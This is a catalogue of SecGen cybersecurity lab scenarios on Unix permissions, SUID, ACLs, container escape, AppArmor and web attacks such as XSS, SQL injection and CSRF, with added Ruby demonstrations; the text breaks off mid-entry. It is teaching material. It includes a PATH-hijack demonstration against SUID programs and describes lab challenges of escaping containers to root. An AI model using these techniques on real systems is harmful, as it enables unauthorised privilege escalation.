| Operating Systems & Virtualisation (OSV) | Primitives for Isolation and Mediation | authentication and identification; Linux authentication; Authentication frameworks (PAM) |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/systems_security/2_pam.xml run

View source

systems_security/4_access_controls.xml

Details

Key Data
Name Access Controls lab
Description
Introduction
Access control involves authorizing and mediating access to resources, determining what actions are permitted, and enforcing security policies. In this lab, you will delve into access control and Unix file permissions, gaining a practical understanding of how they work and their significance in maintaining system security. The lab will introduce you to subjects and objects in the context of access control, different access control models, and Unix file permissions.

Throughout this lab, you will learn how to view and manipulate file permissions in a Unix-like operating system. You will explore the concept of inodes, examine file permissions using the ls command, create and manage hard and symbolic links to files, and understand how directory-level permissions affect file access. Additionally, you will work with the chmod command to change file permissions and discover the significance of the umask command in setting default permissions for new files. By the end of this lab, you will have an understanding of access control, file permissions, and practical skills in managing access rights on a Linux system.

Hackerbot and CTF challenges
This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.

The Hackerbot tasks are designed to provide hands-on experience in managing user access, group permissions, and file ownership, and will enhance your understanding of access control mechanisms. You will create files with specific permissions, ownership, and group assignments while ensuring that other users are appropriately restricted from accessing these files.

Lecture
Slides here

Reading
Chapter 1 "Foundations of Security and Access Control in Computing": Benantar, M. (2006), Access Control Systems: Security, Identity Management and Trust Models, Springer. (ISBN-10: 0387004459)
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/yWJyZEFbchQ; https://youtu.be/i0kO_3ExJv4
VM names shared_desktop; server; hackerbot_server

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Authentication, Authorisation & Accountability (AAA) | Authorisation | access control; enforcing access control; ACCESS CONTROL - DAC (DISCRETIONARY ACCESS CONTROL); Vulnerabilities and attacks on access control misconfigurations |
| Operating Systems & Virtualisation (OSV) | Primitives for Isolation and Mediation | Access controls and operating systems; Linux security model; Unix File Permissions; Filesystems; inodes; and commands; umask |
| Operating Systems & Virtualisation (OSV) | Role of Operating Systems | mediation |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/systems_security/4_access_controls.xml run

View source
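
The lab has you observe permission bits, umask, inodes and links with ls, chmod, umask and ln. The following added example (not from the lab) drives the same mechanics from Ruby so each observation becomes a checkable value: how umask is applied at creation, that a hard link shares the inode and therefore the permission bits, and that a symlink has an inode of its own. The scratch directory, file names and umask value are chosen for the example.

```ruby
# Added example (not from the lab): Unix permission mechanics, verified on real files
# in a scratch directory.
require 'tmpdir'

# Creation mode is the requested mode with the umask bits cleared.
def effective_mode(requested, umask)
  requested & ~umask & 0o7777
end

# Render the nine permission bits the way `ls -l` does.
def mode_string(mode)
  %w[r w x].cycle.take(9).each_with_index.map { |c, i| ((mode >> (8 - i)) & 1) == 1 ? c : '-' }.join
end

def perm_bits(path)
  File.stat(path).mode & 0o777
end

# umask at creation time; a hard link sharing the inode (so chmod on either name
# changes both); a symlink with its own inode. Restores the process umask after.
def permissions_demo
  Dir.mktmpdir do |dir|
    old_umask = File.umask(0o027)
    begin
      target = File.join(dir, 'secret.txt')
      File.write(target, "flag{constructed-for-example}\n")   # open(2) asks for 0666 -> 0640
      created = perm_bits(target)
      hard = File.join(dir, 'hard.txt')
      File.link(target, hard)
      sym = File.join(dir, 'sym.txt')
      File.symlink(target, sym)
      File.chmod(0o600, target)                                 # changes the inode, not a name
      {
        created_mode: created,
        created_string: mode_string(created),
        hard_link_mode: perm_bits(hard),
        same_inode: File.stat(target).ino == File.stat(hard).ino,
        link_count: File.stat(target).nlink,
        symlink_own_inode: File.lstat(sym).ino != File.stat(target).ino,
      }
    ensure
      File.umask(old_umask)
    end
  end
end

if $PROGRAM_NAME == __FILE__
  permissions_demo.each { |k, v| puts "#{k}: #{v.is_a?(Integer) ? format('%o', v) : v}" }
end
```

Deleting or renaming a file is governed by write permission on the directory, not on the file, so the demo deliberately does not assert on that: a root user bypasses the check and the result would depend on who runs it.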

systems_security/5_suid.xml

Details

Key Data
Name Set User ID lab
Description
Introduction
Special file permissions, such as Set UID (SUID) and Set GID (SGID), play a crucial role in Unix-based operating systems by enabling certain processes to run with elevated privileges. Understanding SUID and SGID provides insights into access controls and how Unix systems handle privilege escalation while maintaining control over who can execute specific operations. This lab will empower you with practical knowledge on the use and implications of SUID and SGID.

Throughout this lab, you will learn about the concepts of Real UID (RUID) and Effective UID (EUID), explore SUID and SGID permissions in detail, and analyze their significance in managing system security. You will inspect processes to identify cases where RUID and EUID differ, discover SUID and SGID programs on your system, and understand why they require these special permissions. Additionally, you will compile a SUID C program, assess its security implications, and modify it to rectify vulnerabilities. By the end of this lab, you will have a comprehensive understanding of SUID and SGID, their importance in Unix system security, and practical experience in working with SUID programs.

Hackerbot and CTF challenges
This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.

In the Hackerbot tasks, you'll use SUID to mediate access to a file (accessible exclusively by a specific user through a SUID executable). There are also some problem-based challenges involving hardlinks, relative paths, and combining shell programs with SGID and SUID permissions.

Lecture
Slides continued here

Reading
Chapter 6 "Filesystems and Security": Garfinkel, S. Spafford, G. and Schwartz, A. (2003), Practical Unix and Internet Security, O'Reilly. (ISBN-10: 0596003234)
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/viSkkNB777k; https://youtu.be/PGHsb3bg_h4
VM names shared_desktop; server; hackerbot_server

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Authentication, Authorisation & Accountability (AAA) | Authorisation | access control; Elevated privileges; Real and effective identity; Vulnerabilities and attacks on access control misconfigurations |
| Operating Systems & Virtualisation (OSV) | Primitives for Isolation and Mediation | Access controls and operating systems; Linux security model; Unix File Permissions; setuid/setgid; Hardlink protections |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/systems_security/5_suid.xml run

View source
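
The lab has you find setuid/setgid programs, compare real and effective UIDs, and reason about relative paths inside SUID shell programs. The following added example (not from the lab) does those three things in Ruby: a find-equivalent for setid files, the RUID/EUID state and the privilege-drop order a SUID program should use, and an execvp-style PATH lookup showing why a bare command name inside a SUID program is dangerous. It marks a file it owns setuid, which needs no root; the script body is never executed. The PATH value and file names are assumptions.

```ruby
# Added example (not from the lab): setuid discovery, real vs effective identity,
# privilege dropping, and PATH lookup.
require 'tmpdir'
require 'find'

# `find / -perm /6000 -type f` in Ruby: regular files with setuid or setgid set.
def setid_files(root)
  found = []
  Find.find(root) do |path|
    st = File.lstat(path)
    found << path if st.file? && (st.setuid? || st.setgid?)
  end
  found
end

# Real vs effective identity. A SUID-root binary run by uid 1000 has uid 1000 and
# euid 0; for an ordinary process the two match.
def id_state
  { ruid: Process.uid, euid: Process.euid, rgid: Process.gid, egid: Process.egid,
    privileged: Process.uid != Process.euid || Process.gid != Process.egid }
end

# Permanent drop for a SUID program once the privileged work is done: group before
# user (after dropping uid you can no longer change gid), real, effective and saved
# IDs together so the drop cannot be undone, then verify rather than assume.
def drop_privileges!(uid = Process.uid, gid = Process.gid)
  if Process::Sys.respond_to?(:setresuid)
    Process::Sys.setresgid(gid, gid, gid)
    Process::Sys.setresuid(uid, uid, uid)
  else
    Process::Sys.setgid(gid)
    Process::Sys.setuid(uid)
  end
  raise "privilege drop failed" unless Process.euid == uid && Process.egid == gid
  true
end

# execvp's lookup: the first matching executable in PATH wins. A SUID program that
# runs `cat log` inherits the caller's PATH, so the caller chooses which cat runs.
def resolve_in_path(cmd, path_env)
  path_env.split(':').map { |d| File.join(d, cmd) }.find { |p| File.file?(p) && File.executable?(p) }
end

SAFE_PATH = '/usr/sbin:/usr/bin:/sbin:/bin'.freeze

# Marks a file we own setuid (executing it would only give our own UID), finds it,
# then resolves a bare `cat` under an attacker-controlled PATH and a fixed one.
def setuid_demo
  Dir.mktmpdir do |dir|
    fake_cat = File.join(dir, 'cat')
    File.write(fake_cat, "#!/bin/sh\necho this would run with the SUID owner's privileges\n")
    File.chmod(0o4755, fake_cat)
    {
      setid_found: setid_files(dir),
      hijacked: resolve_in_path('cat', "#{dir}:#{SAFE_PATH}"),
      sanitised: resolve_in_path('cat', SAFE_PATH),
    }
  end
end

if $PROGRAM_NAME == __FILE__
  puts id_state.inspect
  puts setuid_demo.inspect
end
```

The fix for the PATH problem is the one the lab's SUID C exercise leads to: call helpers by absolute path, set PATH yourself before any exec, and drop privileges before doing anything the caller controls.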

systems_security/6_facls.xml

Details

Key Data
Name Access Control Lists (ACLs) lab
Description
Introduction
Access Control Lists (ACLs) are sets of rules attached to resources, specifying which subjects (users or entities) are authorized to access the resource and the type of permissions granted to each subject. ACLs allow for a granular and flexible approach to managing who can access a file, what kind of access they have, and how these permissions are inherited and checked.

You will learn about the fundamental concepts of Full ACLs, their syntax and usage on Linux systems, and how they differ from traditional Unix file permissions. Through hands-on tasks, you will set ACLs on files, manipulate permissions for specific users, explore the mask entry's role in determining maximum permissions, and understand the behavior of access checks in ACLs. Additionally, you will discover the concept of default ACLs and their impact on newly created files within a directory. By comparing Linux ACLs to Windows ACLs, you'll gain insights into the unique features and nuances of each system, such as inheritance logic and the use of global security identifiers. This lab will equip you with practical skills and knowledge to manage access control effectively in a diverse range of computing environments.

Hackerbot and CTF challenges
This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.

The Hackerbot tasks involve creating and managing files and directories using Linux ACLs to control access, allowing specific users to read and write while denying access to others. There is also a file permissions challenge on a server where you take what you've learned over the last few topics to find and exploit a permissions weakness.

Lecture
Slides continued here

Reading
Grunbacher, Andreas. "POSIX Access Control Lists on Linux." USENIX Annual Technical Conference, FREENIX Track. 2003.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/Bn3NJhgmdLk; https://youtu.be/OT7ifs8PkHI
VM names shared_desktop; server; hackerbot_server

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Authentication, Authorisation & Accountability (AAA) | Authorisation | access control; ACCESS CONTROL LIST (ACL); Vulnerabilities and attacks on access control misconfigurations |
| Operating Systems & Virtualisation (OSV) | Primitives for Isolation and Mediation | Access controls and operating systems; Linux security model; Linux Extended Access Control Lists (facl) |

Command to build VMs and start scenario:

```shell
ruby secgen.rb -s scenarios/labs/systems_security/6_facls.xml run
```

View source

systems_security/7_containers.xml

Details

Key Data
Name Containers lab
Description
Introduction
Sandboxing involves restricting the capabilities of individual programs or groups of programs, minimizing the potential damage a rogue program can inflict on a system. This lab focuses on container-based sandboxes and the use of chroot. You will learn how to create a chroot environment, effectively isolating a set of programs within a directory, and run commands inside this sandbox. Furthermore, the lab introduces you to Docker, a popular tool that builds upon the principles of chroot and adds features to automate the creation and deployment of containerized operating systems and applications. You will explore the concept of Docker images as reusable base environments and containers as instances of these images. You will create and manage containers, observe the speed and efficiency of containerization compared to traditional chroot, and analyze the level of isolation Docker provides. This lab equips you with practical knowledge of sandboxing and isolation.

Hackerbot and CTF challenges
This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.

You need to find a way into, and then escape (to root) from, a Docker container and a chroot container. The flags are stored in /root/ on the two VMs, but you first need to find your way in (try a port scan and try connecting to open ports), and then escape confinement.

Lecture
Slides here

Reading
Z. C. Schreuders, T. McGill, and C. Payne, "The State of the Art of Application Restrictions and Sandboxes: A Survey of Application-oriented Access Controls and their Shortfalls," Computers and Security, Volume 32, Elsevier B.V., 2013. DOI: 10.1016/j.cose.2012.09.007
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/f4yBcKkb12g
VM names desktop; hackerbot_server; chroot_esc_server; docker_esc_server

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Authentication, Authorisation & Accountability (AAA) | Authorisation | SANDBOX; Application-based access controls: user-based access controls insufficiently limit privileges |
| Operating Systems & Virtualisation (OSV) | Primitives for Isolation and Mediation | capabilities; Container-based sandboxes: chroot; Docker; Rule-based controls: Coarse grained: Linux capabilities; Vulnerabilities and attacks on sandboxing misconfigurations |
| Operating Systems & Virtualisation (OSV) | Role of Operating Systems | isolation; CONTAINERS |
| Web & Mobile Security (WAM) | Fundamental Concepts and Approaches | sandboxing |

Command to build VMs and start scenario:

```shell
ruby secgen.rb -s scenarios/labs/systems_security/7_containers.xml run
```

View source

systems_security/8_apparmor.xml

Details

Key Data
Name AppArmor lab
Description
Introduction
Mandatory Access Controls (MAC) encompass mechanisms such as Capabilities and AppArmor, which provide system-wide access controls to manage and enforce permissions for processes and applications, mitigating security risks and enhancing overall system security. In this lab, you will explore two aspects of system-wide access controls in Linux security: Capabilities and AppArmor.

First, you will delve into the concept of Capabilities, a coarse-grained approach to control privileges in Linux. You will learn how capabilities can be used to grant specific permissions to programs without having them run as the all-powerful root user. You will also explore AppArmor, a rule-based, fine-grained access control system for Linux. You will examine how AppArmor profiles are used to specify the resources and permissions that a program can access, effectively creating a whitelist of allowed actions. You will create rules and experience the learning mode of AppArmor, which helps construct rules based on actual program behavior and understand the advantages and disadvantages of a blacklist (deny) versus a whitelist (ignore) approach to writing AppArmor rules. By the end of this lab, you will have a deep understanding of how capabilities and AppArmor can enhance the security of your Linux system by controlling what programs can do and which resources they can access.

Hackerbot and CTF challenges
This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.

Hackerbot will challenge you to use AppArmor to provide a shell to attackers, with only limited access to specific resources.

Lecture
Slides continued here

Lectures for the next two weeks
Secure software development

Secure design principles

Slides
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/Xgs5akM6ayc
VM names desktop; hackerbot_server

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Authentication, Authorisation & Accountability (AAA) | Authorisation | ACCESS CONTROL - MAC (MANDATORY ACCESS CONTROL); ACCESS CONTROL - NDAC (NON-DISCRETIONARY ACCESS CONTROL); Application-based access controls: user-based access controls insufficiently limit privileges; Rule-based sandboxes |
| Operating Systems & Virtualisation (OSV) | Primitives for Isolation and Mediation | Rule-based controls: Fine grained: AppArmor; Vulnerabilities and attacks on sandboxing misconfigurations |
| Software Security (SS) | Mitigating Exploitation | limiting privileges |

Command to build VMs and start scenario:

```shell
ruby secgen.rb -s scenarios/labs/systems_security/8_apparmor.xml run
```

View source

web_security/1_intro_web_security.xml

Details

Key Data
Name Introducing Web security
Description
Introduction
In this lab you will delve into concepts and practical exercises that will equip you with a foundational understanding of web security. This hands-on lab explores various aspects of web security, starting with an introduction to client-server interactions using HTTP (HyperText Transfer Protocol). The lab guides you through simulating a web server from scratch using tools like netcat, creating dynamic web pages with PHP, and understanding the intricacies of client-server architecture. The importance of local web proxies, illustrated through the use of Zed Attack Proxy (ZAP), is emphasized as a means to intercept and modify web traffic for security testing purposes. The lab further introduces fuzzing techniques in ZAP and encourages practical application through tasks such as intercepting and altering HTTP requests.

Throughout this lab, you will learn by doing, actively engaging in activities. As part of the hands-on experience, you will also work through scored flag-based tasks, such as completing challenges related to Insecure Direct Object References. By the end of the lab, you will have acquired a solid foundation in web security fundamentals, simulation of web server activities, and practical skills in using tools like ZAP for security testing and assessment. This sets the stage for deeper exploration and learning in subsequent topics, contributing to the development of your web security expertise.
Lab sheet https://docs.google.com/document/d/1vLy56U53lqb8ZpQVLwxznCBsGv0KPM_uXJW1WD5DCiI/edit?usp=sharing
Type ctf-lab; lab-sheet
Author James Davis
VM names web_server; kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Web & Mobile Security (WAM) | Fundamental Concepts and Approaches | JAVASCRIPT; HYPERTEXT MARKUP LANGUAGE (HTML); CASCADING STYLE SHEETS (CSS); HYPERTEXT TRANSFER PROTOCOL (HTTP); HYPERTEXT TRANSFER PROTOCOL (HTTP) - PROXYING; Broken Access Control / Insecure Direct Object References; CLIENT-SERVER MODELS |
| Web & Mobile Security (WAM) | Server-Side Vulnerabilities and Mitigations | server-side misconfiguration and vulnerable components |
| Software Security (SS) | Categories of Vulnerabilities | Web vulnerabilities / OWASP Top 10 |
| Software Security (SS) | Detection of Vulnerabilities | dynamic detection |

Command to build VMs and start scenario:

```shell
ruby secgen.rb -s scenarios/labs/web_security/1_intro_web_security.xml run
```

View source

web_security/2_sessions_and_cookies.xml

Details

Key Data
Name Session Management
Description
In this web security lab you will delve into sessions and cookies. The relevance of this lies in the critical role cookies play in web interactions, enabling websites to remember user states and enhance user experiences. The lab employs practical exercises and open-ended challenges, utilizing tools such as Damn Vulnerable Web App (DVWA), OWASP WebGoat, and OWASP Security Shepherd. As you navigate through the labs, you will gain hands-on experience in understanding cookies, creating a basic PHP page to set cookies, using a local web proxy (OWASP Zap) to inspect cookie interactions, and exploring session cookies. This practical approach provides a foundation for subsequent topics like cross-site scripting and cross-site request forgery.

Throughout the lab, you will learn to self-host PHP pages, use OWASP Zap to analyze and manipulate cookies, and comprehend the nuances of session cookies. The DVWA challenges offer a real-world application of your knowledge, requiring you to assess and exploit vulnerabilities at different security levels. For instance, you will investigate weaknesses in session ID generation, analyze source code for session IDs, and assess the security implications of various approaches. Additionally, CTF tasks in Security Shepherd will provide hands-on experiences in session management, poor data validation, and security misconfigurations. By completing these challenges, you will develop practical skills addressing complex security scenarios mirroring the challenges faced by penetration testers and ethical hackers in real-world scenarios.
Lab sheet https://docs.google.com/document/d/1xcbf0bqtdMGgJAjeedw5MUbkRosMyQ_UZ0gN4IeCBFs/edit?usp=sharing
Type lab-environment; ctf-lab
Author James Davis
VM names web_server; kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Web & Mobile Security (WAM) | Fundamental Concepts and Approaches | cookies; HYPERTEXT MARKUP LANGUAGE (HTML); HYPERTEXT TRANSFER PROTOCOL (HTTP); HYPERTEXT TRANSFER PROTOCOL (HTTP) - PROXYING; Broken Access Control / Insecure Direct Object References; SESSION HIJACKING; CLIENT-SERVER MODELS |
| Web & Mobile Security (WAM) | Client-Side Vulnerabilities and Mitigations | client-side storage |
| Web & Mobile Security (WAM) | Server-Side Vulnerabilities and Mitigations | server-side misconfiguration and vulnerable components |
| Software Security (SS) | Categories of Vulnerabilities | Web vulnerabilities / OWASP Top 10 |
| Software Security (SS) | Detection of Vulnerabilities | dynamic detection |

Command to build VMs and start scenario:

```shell
ruby secgen.rb -s scenarios/labs/web_security/2_sessions_and_cookies.xml run
```

View source

web_security/3_xss.xml

Details

Key Data
Name Cross-Site Scripting
Description
Introduction
In this web security lab you will delve into the critical realm of web application security, focusing specifically on the pervasive threat of Cross-Site Scripting (XSS). XSS is a type of injection attack where malicious code is inserted into a trusted website, often exploiting vulnerabilities in user input handling. The lab covers three main types of XSS attacks: Reflected, Stored, and DOM-Based. These attacks involve injecting malicious scripts into a web application, potentially compromising user data, sessions, and overall security. The lab introduces theoretical concepts behind XSS and provides hands-on experience through practical exercises and challenges.

Throughout this lab, you will engage with various learning resources, including Damn Vulnerable Web App (DVWA), OWASP WebGoat and WebWolf, and OWASP Security Shepherd. The hands-on activities involve creating and manipulating PHP pages, implementing XSS filters, and exploring vulnerabilities in web applications using DVWA challenges. You will also work with WebGoat and Security Shepherd to further validate your understanding of XSS attacks in different scenarios. By the end of this lab, you will have gained practical insights into identifying, exploiting, and mitigating XSS vulnerabilities, a crucial skill in the field of web security.
Lab sheet https://docs.google.com/document/d/1f7hD_sZnBChklLZmskpxp1dIJUG9Ntw_06t76ltnPTk/edit?usp=sharing
Type lab-environment; ctf-lab
Author James Davis
VM names web_server; kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Web & Mobile Security (WAM) | Fundamental Concepts and Approaches | cookies; JAVASCRIPT; HYPERTEXT MARKUP LANGUAGE (HTML); HYPERTEXT TRANSFER PROTOCOL (HTTP) - PROXYING; SESSION HIJACKING; CLIENT-SERVER MODELS |
| Web & Mobile Security (WAM) | Client-Side Vulnerabilities and Mitigations | client-side storage; CLIENT-SIDE VALIDATION |
| Web & Mobile Security (WAM) | Server-Side Vulnerabilities and Mitigations | injection vulnerabilities; server-side misconfiguration and vulnerable components; CROSS-SITE SCRIPTING (XSS); BACK-END |
| Software Security (SS) | Categories of Vulnerabilities | Web vulnerabilities / OWASP Top 10 |
| Software Security (SS) | Prevention of Vulnerabilities | coding practices; Protecting against session management attacks; XSS; SQLi; CSRF |
| Software Security (SS) | Detection of Vulnerabilities | dynamic detection |

Command to build VMs and start scenario:

```shell
ruby secgen.rb -s scenarios/labs/web_security/3_xss.xml run
```

View source

web_security/4_sqli.xml

Details

Key Data
Name SQL injection
Description
Introduction
In this web security lab you will delve into the critical realm of SQL injection attacks, a prevalent threat to web applications. SQL injection occurs when untrusted data is injected into a database query, exploiting vulnerabilities in the application's handling of user inputs. The lab adopts a hands-on approach, utilizing learning resources such as Damn Vulnerable Web App (DVWA), OWASP WebGoat, and OWASP Security Shepherd to guide you through understanding, detecting, and mitigating SQL injection vulnerabilities. The lab emphasizes the importance of working through different layers of security, from client-side validation to application-level filtering, to ultimately interact with the database directly. Through practical exercises and challenges, you will gain an understanding of SQL injection, including blind SQL injection attacks, and learn essential techniques to secure web applications against these threats.

Throughout this lab, you will engage in a series of tasks across various platforms. Starting with WebGoat, you will log in and progress through SQL injection exercises, honing your skills in crafting attacks and understanding mitigation strategies. In DVWA challenges, you will undertake guided walk-throughs at low, medium, and high security levels to retrieve passwords, crack hashed passwords, and master blind SQL injection. Further, Security Shepherd tasks will enhance your skills in session management and SQL injection, reinforcing your ability to apply theoretical concepts in real-world scenarios. By the end, you will have not only learned about SQL injection but also independently completed challenges, solidifying your expertise in securing web applications against this pervasive security threat.
Lab sheet https://docs.google.com/document/d/1G_b4f25ufopbDw6djpO1D-nhbJ7vFOCY-QZJtoTUSKg/edit?usp=sharing
Type lab-environment; ctf-lab
Author James Davis
VM names web_server; kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Web & Mobile Security (WAM) | Fundamental Concepts and Approaches | HYPERTEXT MARKUP LANGUAGE (HTML); HYPERTEXT TRANSFER PROTOCOL (HTTP) - PROXYING; DATABASE; SESSION HIJACKING; CLIENT-SERVER MODELS |
| Web & Mobile Security (WAM) | Server-Side Vulnerabilities and Mitigations | injection vulnerabilities; server-side misconfiguration and vulnerable components; SQL-INJECTION; BACK-END; BLIND ATTACKS |
| Software Security (SS) | Categories of Vulnerabilities | Web vulnerabilities / OWASP Top 10 |
| Software Security (SS) | Prevention of Vulnerabilities | coding practices; Protecting against session management attacks; XSS; SQLi; CSRF |
| Software Security (SS) | Detection of Vulnerabilities | dynamic detection |

Command to build VMs and start scenario:

```shell
ruby secgen.rb -s scenarios/labs/web_security/4_sqli.xml run
```

View source

web_security/5_sqli_advanced.xml

Details

Key Data
Name Advanced SQL injection
Description
Introduction
In this web security lab you will delve into the intricacies of injection attacks, focusing on OS command injection and automated SQL injection. The lab begins by simulating OS command injection in a simple C application, demonstrating how unvalidated user input can lead to potential system shell exploitation. Subsequently, you will explore OS command injection in a PHP application, uncovering the risks associated with unfiltered user input in web environments. The lab sheet then introduces automated SQL injection using sqlmap, a penetration testing tool designed to detect and exploit SQL vulnerabilities efficiently.

Throughout the lab, you will engage with various vulnerable environments, including Damn Vulnerable Web App (DVWA), OWASP WebGoat, and OWASP Security Shepherd. Practical tasks include exploiting SQL injection in DVWA with different security levels, automating SQL injection attacks using sqlmap, and tackling blind SQL injection scenarios. Additionally, you will apply your knowledge to WebGoat, a web application specifically designed for learning security concepts, and complete CTF challenges in Security Shepherd. By the end of the lab, you will have gained hands-on experience in identifying, exploiting, and mitigating OS command injection and SQL injection vulnerabilities, crucial skills for securing web applications in real-world scenarios.
Lab sheet https://docs.google.com/document/d/1tj7qQ-1HbmxXaZNMOCPVECHrFAHpkRVcD_Q0FvMhIWQ/edit?usp=sharing
Type lab-environment; ctf-lab
Author James Davis
VM names web_server; kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Web & Mobile Security (WAM) | Fundamental Concepts and Approaches | HYPERTEXT MARKUP LANGUAGE (HTML); HYPERTEXT TRANSFER PROTOCOL (HTTP) - PROXYING; DATABASE; SESSION HIJACKING; CLIENT-SERVER MODELS |
| Web & Mobile Security (WAM) | Server-Side Vulnerabilities and Mitigations | injection vulnerabilities; server-side misconfiguration and vulnerable components; COMMAND INJECTION; SQL-INJECTION; BACK-END; BLIND ATTACKS |
| Software Security (SS) | Categories of Vulnerabilities | Web vulnerabilities / OWASP Top 10 |
| Software Security (SS) | Prevention of Vulnerabilities | coding practices; Protecting against session management attacks; XSS; SQLi; CSRF |
| Software Security (SS) | Detection of Vulnerabilities | dynamic detection |

Command to build VMs and start scenario:

```shell
ruby secgen.rb -s scenarios/labs/web_security/5_sqli_advanced.xml run
```

View source

web_security/6_csrf.xml

Details

Key Data
Name Cross-Site Request Forgery
Description
Introduction
In this web security lab focused on Cross-Site Request Forgery (CSRF), you will delve into the intricacies of a prevalent attack that exploits the trust websites have in their users. CSRF, also known as session riding, involves users unknowingly sending requests to services they are logged into, utilizing their session cookies and other identifying information. The lab employs resources such as Damn Vulnerable Web App (DVWA), OWASP WebGoat and WebWolf, and CTF via OWASP Security Shepherd. The theoretical foundation covers the distinction between XSS and CSRF, emphasizing CSRF's exploitation of user trust to execute state-changing transactions. The lab introduces you to tools like Zap and WebWolf, guiding you through various exercises in WebGoat and DVWA to simulate and understand CSRF attacks at different security levels.

Throughout the lab, you will engage in hands-on tasks that mirror real-world scenarios. For instance, you'll create an external form using vi text editor, host it with WebWolf, and understand the parameters necessary for a POST request. In DVWA challenges, you'll manipulate HTML forms to exploit vulnerabilities at low, medium, and high security levels. The tasks also extend to combining CSRF with XSS to overcome anti-CSRF measures. By the end of the lab, you'll have a comprehensive understanding of CSRF attacks, CORS limitations, and practical skills in executing and defending against such attacks, enhancing your expertise in web application security.
Lab sheet https://docs.google.com/document/d/1ABryiNKLDiIG6i7PQUztzzynjPo3fRSBP4OakxCPraY/edit?usp=sharing
Type lab-environment; ctf-lab
Author James Davis
VM names web_server; kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Web & Mobile Security (WAM) | Fundamental Concepts and Approaches | cookies; JAVASCRIPT; HYPERTEXT MARKUP LANGUAGE (HTML); HYPERTEXT TRANSFER PROTOCOL (HTTP) - PROXYING; DATABASE; SESSION HIJACKING; CLIENT-SERVER MODELS |
| Web & Mobile Security (WAM) | Client-Side Vulnerabilities and Mitigations | client-side storage; CLIENT-SIDE VALIDATION; clickjacking |
| Web & Mobile Security (WAM) | Server-Side Vulnerabilities and Mitigations | injection vulnerabilities; server-side misconfiguration and vulnerable components; CROSS-SITE SCRIPTING (XSS); CROSS-SITE REQUEST FORGERY (CSRF); CONFUSED DEPUTY ATTACKS; BACK-END |
| Software Security (SS) | Categories of Vulnerabilities | Web vulnerabilities / OWASP Top 10 |
| Software Security (SS) | Prevention of Vulnerabilities | coding practices; Protecting against session management attacks; XSS; SQLi; CSRF |
| Software Security (SS) | Detection of Vulnerabilities | dynamic detection |

Command to build VMs and start scenario:

```shell
ruby secgen.rb -s scenarios/labs/web_security/6_csrf.xml run
```

View source

web_security/7_additional_web.xml

Details

Key Data
Name Additional Web Challenges
Description
Introduction
Web and Network Security additional CTF challenges.
Lab sheet https://docs.google.com/document/d/1DDjyBGtB9vaFD6S2s1jQn7_bpVn4UlK-njbmVX5_UiM/edit?usp=sharing
Type lab-environment; ctf-lab
Author James Davis
VM names web_server; kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Web & Mobile Security (WAM) | Fundamental Concepts and Approaches | web PKI and HTTPS; authentication; ACCESS CONTROL; cookies; passwords and alternatives; JAVASCRIPT; HYPERTEXT MARKUP LANGUAGE (HTML); CASCADING STYLE SHEETS (CSS); HYPERTEXT TRANSFER PROTOCOL (HTTP); HYPERTEXT TRANSFER PROTOCOL (HTTP) - PROXYING; DATABASE; Broken Access Control / Insecure Direct Object References; SESSION HIJACKING; CERTIFICATES; REPRESENTATIONAL STATE TRANSFER (REST); PERMISSION DIALOG BASED ACCESS CONTROL; CLIENT-SERVER MODELS |
| Web & Mobile Security (WAM) | Client-Side Vulnerabilities and Mitigations | client-side storage; CLIENT-SIDE VALIDATION; clickjacking |
| Web & Mobile Security (WAM) | Server-Side Vulnerabilities and Mitigations | injection vulnerabilities; server-side misconfiguration and vulnerable components; CROSS-SITE SCRIPTING (XSS); SAME ORIGIN POLICY (SOP); COMMAND INJECTION; SQL-INJECTION; CROSS-SITE REQUEST FORGERY (CSRF); CONFUSED DEPUTY ATTACKS; BACK-END; BLIND ATTACKS |
| Software Security (SS) | Categories of Vulnerabilities | Web vulnerabilities / OWASP Top 10; API vulnerabilities |
| Software Security (SS) | Prevention of Vulnerabilities | coding practices; Protecting against session management attacks; XSS; SQLi; CSRF; API design |
| Software Security (SS) | Detection of Vulnerabilities | dynamic detection |
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | network traffic |
| Forensics (F) | Main Memory Forensics | network connections; data recovery and file content carving |
| Network Security (NS) | Network Defence Tools | FIREWALLS; IPTables; VIRTUAL - PRIVATE NETWORK (VPN) |
| Network Security (NS) | Internet Architecture | network layer security |
| Web & Mobile Security (WAM) | FIREWALLS | FIREWALLS |

Command to build VMs and start scenario:

```shell
